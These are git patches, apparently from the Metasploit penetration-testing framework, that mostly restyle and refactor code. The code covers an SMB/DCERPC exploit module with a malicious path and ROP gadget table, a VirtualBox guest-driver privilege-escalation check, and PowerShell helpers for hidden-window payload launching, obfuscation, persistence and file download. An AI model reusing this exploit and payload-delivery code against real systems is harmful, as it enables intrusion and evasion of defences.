@@ -1068,30 +1050,30 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     # Build the malicious path name
     # 5b878ae7 "db @eax;g"
-    prefix = "\\"
+    prefix = '\\'
     path =
-      "\x00\\\x00/"*0x10 +
-      Rex::Text.to_unicode("\\") +
-      Rex::Text.to_unicode("R7") +
-      Rex::Text.to_unicode("\\..\\..\\") +
-      Rex::Text.to_unicode("R7") +
-      "\x00"*2
+      "\x00\\\x00/" * 0x10 +
+      Rex::Text.to_unicode('\\') +
+      Rex::Text.to_unicode('R7') +
+      Rex::Text.to_unicode('\\..\\..\\') +
+      Rex::Text.to_unicode('R7') +
+      "\x00" * 2
 
-    server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
+    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
 
-    handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
-      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
+    handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
+                           'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
     )
 
     begin
       # Samba doesn't have this handle and returns an ErrorCode
       dcerpc_bind(handle)
     rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
-      vprint_error("SMB error: #{e.message.to_s}")
+      vprint_error("SMB error: #{e.message}")
       return Msf::Exploit::CheckCode::Safe
     end
 
-    vprint_status("Verifying vulnerable status... (path: 0x%08x)" % path.length)
+    vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
 
     stub =
       NDR.uwstring(server) +
@@ -1102,7 +1084,7 @@ class Metasploit3 < Msf::Exploit::Remote
       NDR.long(0)
 
     resp = dcerpc.call(0x1f, stub)
-    error = resp[4,4].unpack("V")[0]
+    error = resp[4, 4].unpack('V')[0]
 
     # Cleanup
     simple.client.close
@@ -1112,15 +1094,14 @@ class Metasploit3 < Msf::Exploit::Remote
     if (error == 0x0052005c) # \R :)
       return Msf::Exploit::CheckCode::Vulnerable
     else
-      vprint_error("System is not vulnerable (status: 0x%08x)" % error) if error
+      vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
       return Msf::Exploit::CheckCode::Safe
     end
   end
 
-
   def generate_rop(version)
     free_byte = "\x90"
-    #free_byte = "\xcc"
+    # free_byte = "\xcc"
 
     # create a few small gadgets
     #  <free byte>; pop edx; pop ecx; ret
@@ -1166,7 +1147,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
       'call_HeapCreate'                          => 0x21286,
       'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
-      'pop ecx / ret'                            => 0x2e796+6,
+      'pop ecx / ret'                            => 0x2e796 + 6,
       'mov [eax], ecx / ret'                     => 0xd296,
       'jmp eax'                                  => 0x19c6f,
       'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
@@ -1214,14 +1195,13 @@ class Metasploit3 < Msf::Exploit::Remote
       gadget3.unpack('V').first
     ]
 
-
     # convert the meta rop into concrete bytes
     rvas = rvasets[version]
 
     rop.map! { |e|
       if e.kind_of? String
         # Meta-replace (RVA)
-        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
+        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
         module_base + rvas[e]
 
       elsif e == :unused
@@ -1237,9 +1217,8 @@ class Metasploit3 < Msf::Exploit::Remote
     ret = rop.pack('V*')
 
     # check badchars?
-    #idx = Rex::Text.badchar_index(ret, payload_badchars)
+    # idx = Rex::Text.badchar_index(ret, payload_badchars)
 
     ret
   end
-
 end

From 2be6eb16a2f02f9f90f32b91996f34536793709e Mon Sep 17 00:00:00 2001
From: Jay Smith <jsmith@korelogic.com>
Date: Thu, 17 Jul 2014 14:56:34 -0400
Subject: [PATCH 132/321] Add in exploit check and version checks

Move the initial checking for the vboxguest device and os checks
into the MSF check routine.
---
 modules/exploits/windows/local/vbox_guest.rb | 71 ++++++++++++++------
 1 file changed, 49 insertions(+), 22 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 8196c4425f..6e78fbea6d 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -9,6 +9,8 @@ require 'rex'
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Post::File
+  include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
@@ -185,43 +187,68 @@ class Metasploit3 < Msf::Exploit::Local
     return addresses
   end
 
-
-  def exploit
-
+  def check
     vprint_status("Adding the railgun stuff...")
     add_railgun_functions
 
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device("\\\\.\\vboxguest")
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    os = sysinfo["OS"]
+    unless (os =~ /windows xp.*service pack 3/i)
+      return Exploit::CheckCode::Safe
+    end
+
+    file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    unless (major == 4)
+      return Exploit::CheckCode::Safe
+    end
+
+    case minor
+    when 0
+      return Exploit::CheckCode::Vulnerable if build < 26
+    when 1
+      return Exploit::CheckCode::Vulnerable if build < 34
+    when 2
+      return Exploit::CheckCode::Vulnerable if build < 26
+    when 3
+      return Exploit::CheckCode::Vulnerable if build < 12
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/
       fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
-    my_target = nil
-    if target.name =~ /Automatic/
-      print_status("Detecting the target system...")
-      os = sysinfo["OS"]
-      print_status("#{os.inspect}")
-      if os =~ /windows xp/i
-        my_target = targets[1]
-        print_status("Running against #{my_target.name}")
-      end
-    else
-      my_target = target
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    if my_target.nil?
-      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
-    end
-
-    print_status("Checking device...")
     handle = open_device("\\\\.\\vboxguest")
     if handle.nil?
-      fail_with(Failure::NoTarget, "\\\\.\\vboxguest device not found")
-    else
-      print_good("\\\\.\\vboxguest found!")
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
     end
 
+    my_target = targets[1]
     print_status("Disclosing the HalDispatchTable address...")
     @addresses = disclose_addresses(my_target)
     if @addresses.nil?

From b28343842f596ce64824c9a01b9deb049bb9b10f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 20 Jul 2014 21:00:34 +0100
Subject: [PATCH 133/321] Address @jhart-r7's comments

---
 lib/rex/exploitation/powershell/function.rb    |  8 ++++----
 lib/rex/exploitation/powershell/obfu.rb        | 18 ++++++++++++------
 lib/rex/exploitation/powershell/parser.rb      |  2 +-
 lib/rex/exploitation/powershell/psh_methods.rb |  6 +++---
 .../powershell/psh_methods_spec.rb             |  6 +++---
 5 files changed, 23 insertions(+), 17 deletions(-)

diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
index 76fcf5d86e..bd8ae6e433 100644
--- a/lib/rex/exploitation/powershell/function.rb
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -6,6 +6,8 @@ module Exploitation
 module Powershell
 
   class Function
+    FUNCTION_REGEX = Regexp.new(/\[(\w+\[\])\]\$(\w+)\s?=|\[(\w+)\]\$(\w+)\s?=|\[(\w+\[\])\]\s+?\$(\w+)\s+=|\[(\w+)\]\s+\$(\w+)\s?=/i)
+    PARAMETER_REGEX = Regexp.new(/param\s+\(|param\(/im)
     attr_accessor :code, :name, :params
 
     include Output
@@ -32,15 +34,13 @@ module Powershell
     #
     def populate_params
       @params = []
-      start = code.index(/param\s+\(|param\(/im)
+      start = code.index(PARAMETER_REGEX)
       return unless start
       # Get start of our block
       idx = scan_with_index('(',code[start..-1]).first.last + start
       pclause = block_extract(idx)
 
-      func_regex = /\[(\w+\[\])\]\$(\w+)\s?=|\[(\w+)\]\$(\w+)\s?=|\[(\w+\[\])\]\s+?\$(\w+)\s+=|\[(\w+)\]\s+\$(\w+)\s?=/i
-      #func_regex = /\[(\w+\[\])\]\.?\$(\w+)\s?=|\[(\w+)\]\s?\$(\w+)\s?=/i
-      matches = pclause.scan(func_regex)
+      matches = pclause.scan(FUNCTION_REGEX)
 
       # Ignore assignment, create params with class and variable names
       matches.each do |param|
diff --git a/lib/rex/exploitation/powershell/obfu.rb b/lib/rex/exploitation/powershell/obfu.rb
index 1476432256..ed5ddf1e8e 100644
--- a/lib/rex/exploitation/powershell/obfu.rb
+++ b/lib/rex/exploitation/powershell/obfu.rb
@@ -8,6 +8,12 @@ module Exploitation
 module Powershell
 
   module Obfu
+    MULTI_LINE_COMMENTS_REGEX = Regexp.new(/<#(.*?)#>/m)
+    SINGLE_LINE_COMMENTS_REGEX = Regexp.new(/^\s*#(?!.*region)(.*$)/i)
+    WINDOWS_EOL_REGEX = Regexp.new(/[\r\n]+/)
+    UNIX_EOL_REGEX = Regexp.new(/[\n]+/)
+    WHITESPACE_REGEX = Regexp.new(/\s+/)
+    EMPTY_LINE_REGEX = Regexp.new(/^$|^\s+$/)
 
     #
     # Remove comments
@@ -15,9 +21,9 @@ module Powershell
     # @return [String] code without comments
     def strip_comments
       # Multi line
-      code.gsub!(/<#(.*?)#>/m,'')
+      code.gsub!(MULTI_LINE_COMMENTS_REGEX,'')
       # Single line
-      code.gsub!(/^\s*#(?!.*region)(.*$)/i,'')
+      code.gsub!(SINGLE_LINE_COMMENTS_REGEX,'')
 
       code
     end
@@ -28,9 +34,9 @@ module Powershell
     # @return [String] code without empty lines
     def strip_empty_lines
       # Windows EOL
-      code.gsub!(/[\r\n]+/,"\r\n")
+      code.gsub!(WINDOWS_EOL_REGEX,"\r\n")
       # UNIX EOL
-      code.gsub!(/[\n]+/,"\n")
+      code.gsub!(UNIX_EOL_REGEX,"\n")
 
       code
     end
@@ -41,7 +47,7 @@ module Powershell
     #
     # @return [String] code with whitespace stripped
     def strip_whitespace
-      code.gsub!(/\s+/,' ')
+      code.gsub!(WHITESPACE_REGEX,' ')
 
       code
     end
@@ -84,7 +90,7 @@ module Powershell
       subs.each do |modifier|
         self.send(modifier)
       end
-      code.gsub!(/^$|^\s+$/,'')
+      code.gsub!(EMPTY_LINE_REGEX,'')
 
       code
     end
diff --git a/lib/rex/exploitation/powershell/parser.rb b/lib/rex/exploitation/powershell/parser.rb
index 7564d56082..bd679d845e 100644
--- a/lib/rex/exploitation/powershell/parser.rb
+++ b/lib/rex/exploitation/powershell/parser.rb
@@ -125,7 +125,7 @@ module Powershell
     end
 
     #
-    # Extract block of code between inside brackets/parens
+    # Extract block of code inside brackets/parenthesis
     #
     # Attempts to match the bracket at idx, handling nesting manually
     # Once the balanced matching bracket is found, all script content
diff --git a/lib/rex/exploitation/powershell/psh_methods.rb b/lib/rex/exploitation/powershell/psh_methods.rb
index 398e5b2e1a..d85a739846 100644
--- a/lib/rex/exploitation/powershell/psh_methods.rb
+++ b/lib/rex/exploitation/powershell/psh_methods.rb
@@ -18,9 +18,9 @@ module Powershell
     # @param target [String] Location to save the file
     #
     # @return [String] Powershell code to download a file
-    def self.download(src,target=nil)
+    def self.download(src, target)
       target ||= '$pwd\\' << src.split('/').last
-      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
+      return %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
     end
 
     #
@@ -53,7 +53,7 @@ module Powershell
     #
     # @return [String] Powershell code to identify the PID of a file
     #   lock owner
-    def self.who_locked_file?(filename)
+    def self.who_locked_file(filename)
       return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
 
diff --git a/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb b/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
index a1c85cfac6..a94924f215 100644
--- a/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
+++ b/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
@@ -7,7 +7,7 @@ describe Rex::Exploitation::Powershell::PshMethods do
 
   describe "::download" do
     it 'should return some powershell' do
-      script = Rex::Exploitation::Powershell::PshMethods.download('a')
+      script = Rex::Exploitation::Powershell::PshMethods.download('a','b')
       script.should be
       script.include?('WebClient').should be_true
     end
@@ -26,9 +26,9 @@ describe Rex::Exploitation::Powershell::PshMethods do
       script.include?('AsPlainText').should be_true
     end
   end
-  describe "::who_locked_file?" do
+  describe "::who_locked_file" do
     it 'should return some powershell' do
-      script = Rex::Exploitation::Powershell::PshMethods.who_locked_file?('a')
+      script = Rex::Exploitation::Powershell::PshMethods.who_locked_file('a')
       script.should be
       script.include?('Get-Process').should be_true
     end

From 5f0533677e2da98568c43d1f6bf74c6918548905 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 20 Jul 2014 21:07:59 +0100
Subject: [PATCH 134/321] Cheat/Rubycop all the things

---
 lib/msf/core/exploit/powershell.rb            |  83 ++--
 lib/rex/exploitation/powershell.rb            |  94 +++--
 lib/rex/exploitation/powershell/function.rb   |  10 +-
 lib/rex/exploitation/powershell/obfu.rb       |  25 +-
 lib/rex/exploitation/powershell/output.rb     |  43 +--
 lib/rex/exploitation/powershell/param.rb      |   8 +-
 lib/rex/exploitation/powershell/parser.rb     | 356 +++++++++---------
 .../exploitation/powershell/psh_methods.rb    |  17 +-
 lib/rex/exploitation/powershell/script.rb     |  25 +-
 9 files changed, 308 insertions(+), 353 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 85ceff6fbe..c45e002274 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -3,7 +3,6 @@ require 'rex/exploitation/powershell'
 
 module Msf
 module Exploit::Powershell
-
   PowershellScript = Rex::Exploitation::Powershell::Script
 
   def initialize(info = {})
@@ -16,12 +15,7 @@ module Exploit::Powershell
         OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
         OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
         OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
-        OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', [
-          'net',
-          'reflection',
-          'old',
-          'msil'
-        ]]),
+        OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w(net reflection old msil)]),
       ], self.class)
   end
 
@@ -36,7 +30,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v}.keys.map do |k|
+    datastore.select { |k, v| k =~ /^Powershell::(strip|sub)/ and v }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -56,7 +50,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v}.keys.map do |k|
+    datastore.select { |k, v| k =~ /^Powershell::(strip|sub)/ and v }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -75,14 +69,14 @@ module Exploit::Powershell
   #
   # @return [String] Powershell command line with arguments
   def generate_psh_command_line(opts)
-    if opts[:path] and (opts[:path][-1,1] != "\\")
-      opts[:path] << "\\"
+    if opts[:path] and (opts[:path][-1, 1] != '\\')
+      opts[:path] << '\\'
     end
 
     if opts[:no_full_stop]
-      binary = "powershell"
+      binary = 'powershell'
     else
-      binary = "powershell.exe"
+      binary = 'powershell.exe'
     end
 
     args = generate_psh_args(opts)
@@ -122,13 +116,13 @@ module Exploit::Powershell
   #
   # @return [String] Powershell command arguments
   def generate_psh_args(opts)
-    return "" unless opts
+    return '' unless opts
 
-    unless opts.has_key? :shorten
+    unless opts.key? :shorten
       opts[:shorten] = (datastore['Powershell::method'] != 'old')
     end
 
-    arg_string = " "
+    arg_string = ' '
     opts.each_pair do |arg, value|
       case arg
       when :encodedcommand
@@ -140,25 +134,25 @@ module Exploit::Powershell
       when :file
         arg_string << "-File #{value} " if value
       when :noexit
-        arg_string << "-NoExit " if value
+        arg_string << '-NoExit ' if value
       when :nologo
-        arg_string << "-NoLogo " if value
+        arg_string << '-NoLogo ' if value
       when :noninteractive
-        arg_string << "-NonInteractive " if value
+        arg_string << '-NonInteractive ' if value
       when :mta
-        arg_string << "-Mta " if value
+        arg_string << '-Mta ' if value
       when :outputformat
         arg_string << "-OutputFormat #{value} " if value
       when :sta
-        arg_string << "-Sta " if value
+        arg_string << '-Sta ' if value
       when :noprofile
-        arg_string << "-NoProfile " if value
+        arg_string << '-NoProfile ' if value
       when :windowstyle
         arg_string << "-WindowStyle #{value} " if  value
       end
     end
 
-    #Command must be last (unless from stdin - etc)
+    # Command must be last (unless from stdin - etc)
     if opts[:command]
       arg_string << "-Command #{opts[:command]}"
     end
@@ -182,10 +176,10 @@ module Exploit::Powershell
       arg_string.gsub!('-WindowStyle ', '-w ')
     end
 
-    #Strip off first space character
+    # Strip off first space character
     arg_string = arg_string[1..-1]
-    #Remove final space character
-    arg_string = arg_string[0..-2] if (arg_string[-1] == " ")
+    # Remove final space character
+    arg_string = arg_string[0..-2] if (arg_string[-1] == ' ')
 
     arg_string
   end
@@ -202,14 +196,14 @@ module Exploit::Powershell
   # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {
-        :noprofile => true,
-        :windowstyle => 'hidden',
+      noprofile: true,
+      windowstyle: 'hidden',
     }
 
     if encoded
       arg_opts[:encodedcommand] = ps_code
     else
-      arg_opts[:command] = ps_code.gsub("'","''")
+      arg_opts[:command] = ps_code.gsub("'", "''")
     end
 
     # Old technique fails if powershell exits..
@@ -224,7 +218,7 @@ $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
-    process_start_info.gsub!("\n",';')
+    process_start_info.gsub!("\n", ';')
 
     archictecure_detection = <<EOS
 if([IntPtr]::Size -eq 4){
@@ -234,7 +228,7 @@ if([IntPtr]::Size -eq 4){
 };
 EOS
 
-    archictecure_detection.gsub!("\n","")
+    archictecure_detection.gsub!("\n", '')
 
     archictecure_detection + process_start_info
   end
@@ -264,17 +258,17 @@ EOS
   #   argument in single quotes unless :encode_final_payload
   #
   # @return [String] Powershell command line with payload
-  def cmd_psh_payload(pay, payload_arch, opts={})
+  def cmd_psh_payload(pay, payload_arch, opts = {})
     opts[:persist] ||= datastore['Powershell::persist']
     opts[:prepend_sleep] ||= datastore['Powershell::prepend_sleep']
     opts[:method] ||= datastore['Powershell::method']
 
     if opts[:encode_inner_payload] && opts[:encode_final_payload]
-      raise RuntimeError, ":encode_inner_payload and :encode_final_payload are incompatible options"
+      fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
     end
 
     if opts[:no_equals] && !opts[:encode_final_payload]
-      raise RuntimeError, ":no_equals requires :encode_final_payload option to be used"
+      fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
     end
 
     psh_payload = case opts[:method]
@@ -285,15 +279,15 @@ EOS
     when 'old'
       Msf::Util::EXE.to_win32pe_psh(framework, pay)
     when 'msil'
-      raise RuntimeError, "MSIL Powershell method no longer exists"
+      fail RuntimeError, 'MSIL Powershell method no longer exists'
     else
-      raise RuntimeError, "No Powershell method specified"
+      fail RuntimeError, 'No Powershell method specified'
     end
 
     # Run our payload in a while loop
     if opts[:persist]
-      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-      sleep_time = rand(5)+5
+      fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
+      sleep_time = rand(5) + 5
       vprint_status("Sleep time set to #{sleep_time} seconds")
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
@@ -334,8 +328,8 @@ EOS
     final_payload = run_hidden_psh(smallest_payload, payload_arch, encoded)
 
     command_args = {
-      :noprofile => true,
-      :windowstyle => 'hidden'
+      noprofile: true,
+      windowstyle: 'hidden'
     }.merge(opts)
 
     if opts[:encode_final_payload]
@@ -345,14 +339,14 @@ EOS
       # payload contains none.
       if opts[:no_equals]
         while command_args[:encodedcommand].include? '='
-          final_payload << " "
+          final_payload << ' '
           command_args[:encodedcommand] = encode_script(final_payload)
         end
       end
     else
       if opts[:use_single_quotes]
         # Escape Single Quotes
-        final_payload.gsub!("'","''")
+        final_payload.gsub!("'", "''")
         # Wrap command in quotes
         final_payload = "'#{final_payload}'"
       end
@@ -370,20 +364,17 @@ EOS
 
     vprint_status("Powershell command length: #{command.length}")
     if command.length > 8191
-      raise RuntimeError, "Powershell command length is greater than the command line maximum (8192 characters)"
+      fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
     end
 
     command
   end
 
-
   #
   # Useful method cache
   #
   module PshMethods
     include Rex::Exploitation::Powershell::PshMethods
   end
-
 end
 end
-
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index dd542e8f66..bfc42e9001 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -9,58 +9,54 @@ require 'rex/exploitation/powershell/script'
 require 'rex/exploitation/powershell/psh_methods'
 
 module Rex
-module Exploitation
+  module Exploitation
+    module Powershell
+      #
+      # Reads script into a PowershellScript
+      #
+      # @param script_path [String] Path to the Script File
+      #
+      # @return [Script] Powershell Script object
+      def self.read_script(script_path)
+        Rex::Exploitation::Powershell::Script.new(script_path)
+      end
 
-module Powershell
+      #
+      # Insert substitutions into the powershell script
+      # If script is a path to a file then read the file
+      # otherwise treat it as the contents of a file
+      #
+      # @param script [String] Script file or path to script
+      # @param subs [Array] Substitutions to insert
+      #
+      # @return [String] Modified script file
+      def self.make_subs(script, subs)
+        if ::File.file?(script)
+          script = ::File.read(script)
+        end
 
-  #
-  # Reads script into a PowershellScript
-  #
-  # @param script_path [String] Path to the Script File
-  #
-  # @return [Script] Powershell Script object
-  def self.read_script(script_path)
-    Rex::Exploitation::Powershell::Script.new(script_path)
-  end
+        subs.each do |set|
+          script.gsub!(set[0], set[1])
+        end
 
-  #
-  # Insert substitutions into the powershell script
-  # If script is a path to a file then read the file
-  # otherwise treat it as the contents of a file
-  #
-  # @param script [String] Script file or path to script
-  # @param subs [Array] Substitutions to insert
-  #
-  # @return [String] Modified script file
-  def self.make_subs(script, subs)
-    if ::File.file?(script)
-      script = ::File.read(script)
+        script
+      end
+
+      #
+      # Return an array of substitutions for use in make_subs
+      #
+      # @param subs [String] A ; seperated list of substitutions
+      #
+      # @return [Array] An array of substitutions
+      def self.process_subs(subs)
+        return [] if subs.nil? or subs.empty?
+        new_subs = []
+        subs.split(';').each do |set|
+          new_subs << set.split(',', 2)
+        end
+
+        new_subs
+      end
     end
-
-    subs.each do |set|
-      script.gsub!(set[0],set[1])
-    end
-
-    script
   end
-
-  #
-  # Return an array of substitutions for use in make_subs
-  #
-  # @param subs [String] A ; seperated list of substitutions
-  #
-  # @return [Array] An array of substitutions
-  def self.process_subs(subs)
-    return [] if subs.nil? or subs.empty?
-    new_subs = []
-    subs.split(';').each do |set|
-      new_subs << set.split(',', 2)
-    end
-
-    new_subs
-  end
-
 end
-end
-end
-
diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
index bd8ae6e433..1792be96a6 100644
--- a/lib/rex/exploitation/powershell/function.rb
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -2,9 +2,7 @@
 
 module Rex
 module Exploitation
-
 module Powershell
-
   class Function
     FUNCTION_REGEX = Regexp.new(/\[(\w+\[\])\]\$(\w+)\s?=|\[(\w+)\]\$(\w+)\s?=|\[(\w+\[\])\]\s+?\$(\w+)\s+=|\[(\w+)\]\s+\$(\w+)\s?=/i)
     PARAMETER_REGEX = Regexp.new(/param\s+\(|param\(/im)
@@ -14,7 +12,7 @@ module Powershell
     include Parser
     include Obfu
 
-    def initialize(name,code)
+    def initialize(name, code)
       @name = name
       @code = code
       populate_params
@@ -37,7 +35,7 @@ module Powershell
       start = code.index(PARAMETER_REGEX)
       return unless start
       # Get start of our block
-      idx = scan_with_index('(',code[start..-1]).first.last + start
+      idx = scan_with_index('(', code[start..-1]).first.last + start
       pclause = block_extract(idx)
 
       matches = pclause.scan(FUNCTION_REGEX)
@@ -50,7 +48,7 @@ module Powershell
           if value
             if klass
               name = value
-              @params << Param.new(klass,name)
+              @params << Param.new(klass, name)
               break
             else
               klass = value
@@ -60,8 +58,6 @@ module Powershell
       end
     end
   end
-
 end
 end
 end
-
diff --git a/lib/rex/exploitation/powershell/obfu.rb b/lib/rex/exploitation/powershell/obfu.rb
index ed5ddf1e8e..c459a3bfa7 100644
--- a/lib/rex/exploitation/powershell/obfu.rb
+++ b/lib/rex/exploitation/powershell/obfu.rb
@@ -4,9 +4,7 @@ require 'rex/text'
 
 module Rex
 module Exploitation
-
 module Powershell
-
   module Obfu
     MULTI_LINE_COMMENTS_REGEX = Regexp.new(/<#(.*?)#>/m)
     SINGLE_LINE_COMMENTS_REGEX = Regexp.new(/^\s*#(?!.*region)(.*$)/i)
@@ -21,9 +19,9 @@ module Powershell
     # @return [String] code without comments
     def strip_comments
       # Multi line
-      code.gsub!(MULTI_LINE_COMMENTS_REGEX,'')
+      code.gsub!(MULTI_LINE_COMMENTS_REGEX, '')
       # Single line
-      code.gsub!(SINGLE_LINE_COMMENTS_REGEX,'')
+      code.gsub!(SINGLE_LINE_COMMENTS_REGEX, '')
 
       code
     end
@@ -34,9 +32,9 @@ module Powershell
     # @return [String] code without empty lines
     def strip_empty_lines
       # Windows EOL
-      code.gsub!(WINDOWS_EOL_REGEX,"\r\n")
+      code.gsub!(WINDOWS_EOL_REGEX, "\r\n")
       # UNIX EOL
-      code.gsub!(UNIX_EOL_REGEX,"\n")
+      code.gsub!(UNIX_EOL_REGEX, "\n")
 
       code
     end
@@ -47,7 +45,7 @@ module Powershell
     #
     # @return [String] code with whitespace stripped
     def strip_whitespace
-      code.gsub!(WHITESPACE_REGEX,' ')
+      code.gsub!(WHITESPACE_REGEX, ' ')
 
       code
     end
@@ -58,7 +56,7 @@ module Powershell
     # @return [String] code with variable names replaced with unique values
     def sub_vars
       # Get list of variables, remove reserved
-      get_var_names.each do |var,sub|
+      get_var_names.each do |var, _sub|
         code.gsub!(var, "$#{@rig.init_var(var)}")
       end
 
@@ -72,7 +70,7 @@ module Powershell
     #   values
     def sub_funcs
       # Find out function names, make map
-      get_func_names.each do |var, sub|
+      get_func_names.each do |var, _sub|
         code.gsub!(var, @rig.init_var(var))
       end
 
@@ -83,21 +81,18 @@ module Powershell
     # Perform standard substitutions
     #
     # @return [String] code with standard substitution methods applied
-    def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
+    def standard_subs(subs = %w(strip_comments strip_whitespace sub_funcs sub_vars))
       # Save us the trouble of breaking injected .NET and such
       subs.delete('strip_whitespace') unless get_string_literals.empty?
       # Run selected modifiers
       subs.each do |modifier|
-        self.send(modifier)
+        send(modifier)
       end
-      code.gsub!(EMPTY_LINE_REGEX,'')
+      code.gsub!(EMPTY_LINE_REGEX, '')
 
       code
     end
-
   end # Obfu
-
 end
 end
 end
-
diff --git a/lib/rex/exploitation/powershell/output.rb b/lib/rex/exploitation/powershell/output.rb
index 7a72ca01fd..ea42c1770b 100644
--- a/lib/rex/exploitation/powershell/output.rb
+++ b/lib/rex/exploitation/powershell/output.rb
@@ -5,11 +5,8 @@ require 'rex/text'
 
 module Rex
 module Exploitation
-
 module Powershell
-
   module Output
-
     #
     # To String
     #
@@ -32,7 +29,7 @@ module Powershell
     # @return [String] Powershell code with line numbers
     def to_s_lineno
       numbered = ''
-      code.split(/\r\n|\n/).each_with_index do |line,idx|
+      code.split(/\r\n|\n/).each_with_index do |line, idx|
         numbered << "#{idx}: #{line}"
       end
 
@@ -49,27 +46,27 @@ module Powershell
     def deflate_code(eof = nil)
       # Compress using the Deflate algorithm
       compressed_stream = ::Zlib::Deflate.deflate(code,
-      ::Zlib::BEST_COMPRESSION)
+                                                  ::Zlib::BEST_COMPRESSION)
 
       # Base64 encode the compressed file contents
       encoded_stream = Rex::Text.encode_base64(compressed_stream)
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  "$s=New-Object IO.MemoryStream(,"
+      psh_expression =  '$s=New-Object IO.MemoryStream(,'
       psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Read & delete the first two bytes due to incompatibility with MS
-      psh_expression << "$s.ReadByte();"
-      psh_expression << "$s.ReadByte();"
+      psh_expression << '$s.ReadByte();'
+      psh_expression << '$s.ReadByte();'
